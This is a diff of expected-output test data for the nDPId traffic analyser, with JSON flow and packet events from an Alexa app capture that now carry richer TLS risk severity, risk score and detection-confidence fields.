 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1490976165122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976165122,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZadAAEAG4VusECrYNF7ohptGAbs\/AhttslOW0lAQAVd6GQAA"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2560,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976165062,"flow_last_seen":1490976165125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1490976165125,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2561,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976165062,"flow_last_seen":1490976165190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976165190,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976169531,"flow_last_seen":1490976169531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976169531,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2576,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1490976169531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976169531,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8anRAAEAG3HqsECrYNF7ohrK4AbvvmuryAAAAAKAC\/\/9DtAAAAgQFtAQCCAoA9oCGAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2577,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1490976169726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976169726,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwhFlAAOcGG6E0XuiGrBAq2AG7srhwEXla75rq83ASH\/73zwAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1490976169729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976169729,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoanVAAEAG3I2sECrYNF7ohrK4AbvvmurzcBF5W1AQAVdCQQAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2579,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976169531,"flow_last_seen":1490976169731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976169731,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2580,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976169531,"flow_last_seen":1490976169888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976169888,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"ts_msec":1490976174736,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"ts_msec":1490976174736,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2594,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"ts_msec":1490976174736,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1490976177026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1490976177026,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWmFAAEARM1GsECrYrBAqARDYADUALXE1hGEBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177026,"flow_last_seen":1490976177026,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976177026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1490976177105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1490976177105,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR5+JAAEARpb+sECoBrBAq2AA1ENgAPRuAhGGBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAACEABDbvHLI="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2612,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976177105,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976177116,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k45AAEAGfKSsECrYNu8cssZsAbvv1RDwAAAAAKAC\/\/\/QEwAAAgQFtAQCCAoA9oN+AAAAAAEDAwg="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177116,"flow_last_seen":1490976177116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976177116,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -832,81 +832,81 @@
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2617,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1490976177226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976177226,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWDhAAOcGEQY27xyyrBAq2AG7xm3jvKzYm8EnVHASH\/4drgAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2619,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok49AAEAGfLesECrYNu8cssZsAbvv1RDxxhHYKlAQAVccyQAA"}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2620,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1490976177232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976177232,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopC1AAEAGbBmsECrYNu8cssZtAbubwSdU47ys2VAQAVdoHwAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2622,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976177233,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177116,"flow_last_seen":1490976177235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1490976177235,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976177276,"flow_last_seen":1490976177276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976177276,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2624,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1490976177276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976177276,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZidAAEAGqgusECrYNu8cssZvAbuB1uWoAAAAAKAC\/\/9pRgAAAgQFtAQCCAoA9oOPAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1490976177409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976177409,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwnrRAAOcGyok27xyyrBAq2AG7xm8x5Gl6gdblqXASH\/5ueAAAAgQFtAEDAwY="}
-01518{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}}
